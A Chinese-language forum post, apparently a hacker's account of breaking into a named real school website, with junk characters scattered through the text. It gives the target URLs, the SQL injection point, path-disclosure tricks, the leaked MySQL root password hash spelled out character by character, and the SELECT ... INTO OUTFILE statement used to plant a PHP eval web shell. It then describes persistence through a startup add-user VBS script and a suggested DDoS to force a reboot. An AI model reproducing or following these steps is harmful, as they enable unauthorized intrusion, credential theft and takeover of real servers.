第一眼看去,好像全是html静态的,都知道静态的根本不好日,多点击几个专栏5 _& l' n! x/ X4 W2 L) X j& R
发现这个:http://www.dyyz.net.cn/celebrate/list.php?id=3 -0 -1 判断后确认存在注入!, v* |' f7 E, ^" l
/ D) ?- N1 Z" n0 E) Q) M" I
6 u9 p7 n' U+ O# i1 s
, [8 Z" N7 `+ }/ }: o4 C常规手工不行,尝试突破也不行,利用穿山甲 可以注入:root权限
5 t* a9 E5 y6 Q5 Z# @9 [3 G9 D6 c6 n
那么想可以直接写入shell ,getshell有几个条件:. g% K1 V1 y: \3 q1 T2 e
1、知道站点物理路径 2、有足够大的权限 3、magic_quotes_gpc()=OFF
9 e" ?% Q7 \, c
5 J" r. Q5 z8 ]试着爆绝对路径:
9 `$ H- z) |; V8 K6 h& i1./phpMyAdmin/index.php?lang[]=1
! \3 K3 k5 k" S: I: _3 [2./phpMyAdmin/phpinfo.php
; q. b% E/ _5 v* Z3./load_file() ! p8 I" r0 w l" m) Q
4./phpmyadmin/themes/darkblue_orange/layout.inc.php " C' }* r& f2 @; ~* @3 e. X
5./phpmyadmin/libraries/select_lang.lib.php % ^2 ~. b# I* V! U- [ Y' G$ g# W
6./phpmyadmin/libraries/lect_lang.lib.php 5 Z& p' G6 p p* [. N
7./phpmyadmin/libraries/mcrypt.lib.php
- B" q5 m( f2 i& {8./phpmyadmin/libraries/export/xls.php # w( T: U2 }( ~2 y: e
/ y4 _" y0 g) t A7 C9 x
均不行...........................
; e& H7 {. e/ B$ m0 r( e; {
/ d/ }2 ^' ^; ^! x御剑扫到这个: http://www.dyyz.net.cn//phpinfo.php 获得网站路径:D:/www/phpinfo.php 2 `- \1 |- x I
) G! D* ~9 e9 g0 q5 ?
权限为root,知道网站路径,可是条件3不符合,没法写入shell ,不过服务器存在phpmyadmin
- h( _, W# `6 B/ e8 y, H6 J: T; Z9 z0 k& F, n( y+ Q4 K: D% I8 \& g
默认不行,尝试万能密码:帐号 'localhost'@'@" 密码空 ,登录失败
) @3 ]( M, b8 j% \" Q6 Y
% a% O" ~9 a6 }" ]9 i敏感东西: http://202.103.49.66/Admincp.php 社工进不去........... 5 E. F5 B6 U: }) O
4 w) t5 {4 h8 k想想root还可以读,读到root密码进phpmyadmin 也可以拿shell
5 f% P( z" f l0 ^2 J' z1 V
* F+ g4 I, O" i9 \http://www.dyyz.net.cn//phpinfo.php 泄露了D:\phpStudy\PHP5\php.ini
6 P) v& P: n( y
" |4 e' d( ?' j% L+ T' u# D0 J自己修改好读root密码的路径:D:\phpStudy\MySQL\Data\mysql\user.MYD
5 W6 T# a! G$ L- G; Y2 o' d2 L+ F$ M* P
成功读到root密码: , r) q; w) d$ a
- m C, i& Y% G# p& s& n( V4 `17---- r(0072) + R2 g% y* p6 `& H% z0 Z' }/ p' k
18---- o(006f)
* r8 I/ V4 e' j% S. z19---- o(006f) 1 x6 r+ }# [5 e* A9 I6 A3 v7 f5 Y
20---- t(0074)
/ ?" @! c3 Z6 ]21---- *(002a)
( k* E- u3 ^+ X* e- t22---- 8(0038)
/ z1 l2 ^4 ~) f' n. B9 K8 z23---- 2(0032) ' G, N7 b ]- e" b
24---- E(0045) . W. g% ]) I' L/ H
25---- 1(0031) 7 e b1 S7 ] {" `3 Y' r6 @+ U& _
26---- C(0043)
# E) E! Y, _. j27---- 5(0035)
! x' @7 j) f0 ?# G4 W28---- 8(0038) % V: {5 T3 [$ A" o* ^
29---- 2(0032) ; f& k0 K1 U L* E. U: t) f
30---- 8(0038) % D- B% d; V5 `8 l0 p
31---- A(0041)
3 Z: B: p5 A1 R7 u. ]$ Y4 h32---- 9(0039) 9 E- L7 s! Z! N i
33---- B(0042)
! T, i0 T4 G/ `# E+ X5 n8 ]34---- 5(0035)
/ v! Z8 y1 K! l& M! S, n' k, f35---- 4(0034)
Y7 ` [9 l' }' P; ^% g% q; N! Z36---- 8(0038)
0 ^% L6 D+ I" {6 ~1 i37---- 6(0036)
4 n( ]3 x: ^- {) O; J! d38---- 4(0034) & q* D2 h7 a D2 E: ?7 l
39---- 9(0039) % A [0 b: [' y0 J' X/ B& M! t
40---- 1(0031)
# l b( K( O# Y41---- 1(0031) # O3 x- ?% e6 W
42---- 5(0035) 1 q. i1 E5 ]: h
43---- 3(0033)
+ k& F2 Q' N) H. z& H" u44---- 5(0035) 4 X; o5 H, l0 Q7 I" [5 |1 m9 ^) R
45---- 9(0039)
' B1 q7 `) s4 V* _, j2 s' S46---- 8(0038) 8 Z# A; r2 {% m/ L
47---- F(0046) 6 T# ~. S+ I6 ]% Z
48---- F(0046) , a( G/ `: b& w; A' G5 q3 G( Z
49---- 4(0034)
5 C1 I! S# U9 T- S( o50---- F(0046)
- t+ z3 p. Y4 `. R+ j/ |51---- 0(0030) 8 n+ M2 C l9 z8 s4 n
52---- 3(0033) 4 {3 _* \3 d6 `8 H
53---- 2(0032)
# ?3 M% m) ?9 S* o5 D54---- A(0041)
" `) \$ t/ }$ k- q7 G55---- 4(0034)
3 n6 @2 o- _0 @- a. j2 C56---- A(0041) 7 i2 e7 Z. L5 X4 l1 a1 ^
57---- B(0042) ; {- X% v: M" `3 B" M# X
58---- *(0044)
5 |5 ^* A- B R0 r( I. m59---- *(0035) . i# ]- `8 O7 p Q) A2 \% H
60---- *(0041) , S- L" a5 O p+ |" X7 E
61---- *0032)
% z. Z5 K1 d* G
& t( G( _8 ~5 L# G解密后成功登陆phpmyamin
/ Q* p5 Z2 R* o0 k x+ o 5 \9 w! `- C" P- ?$ d
+ N4 i$ s; Y: u9 I2 d9 x
) H3 R. T$ E& l5 y
% r5 k/ d& R9 V, @找到mysql数据库,执行sql语句:elect '<?php @eval($_POST[pass]);?>'INTO OUTFILE 'd:/wamp/www/daxia.php'
M* ~7 v) @0 ?6 ~. w# T/ Q
9 l' T# M( f1 |/ n+ u; o成功执行,拿下shell,菜刀连接: ?9 G( f. B' |8 |, S
" U3 u. P0 B! ?, C+ P) z服务器不支持asp,aspx,php提权无果...................
- r# X. Y9 |& Q4 Q4 M; s9 C5 r% A! h' y5 E: @4 o0 S0 N7 x9 y
但服务器权限很松,上传个远控小马或是一个添加用户的vbs程序到启动里: ' s3 X# y# U1 {# g/ A
服务器上已经有个隐藏帐号了 ]/ b# v. a8 G F( }. T* U
别名 administrators
" i9 X. e6 a* H5 F. \ J; b注释 管理员对计算机/域有不受限制的完全访问权 3 M4 x4 d/ }* n0 I; r
成员 0 x! L& I7 n8 L2 W/ E c: ^
-------------------------------------------------------------------------------3 u$ j+ }: }) l
admin2 T; o9 ?$ k- ~
Administrator' o4 {# N6 ?' Z' f
slipper$$ }' v" [ d' V0 `
sqluser3 s( M; S! B/ [% k& c
命令成功完成。
# B1 _ y2 c: B D
2 \7 w/ M' c4 C% M服务器权限很松,上传个vbs添加用户的到启动,不要用bat,会开机的时候显示运行批处理的。
( S+ _2 w! ~0 f( z. h
& R6 V9 Y' N0 X7 gddos服务器重启,不然就只能坐等服务器重启了...............................5 s' ?0 V0 b6 J4 [/ o3 h3 `/ T& g9 f
& o) I7 N! F# i7 w% U2 K # e! R4 |0 h/ n2 M! c0 {9 C
|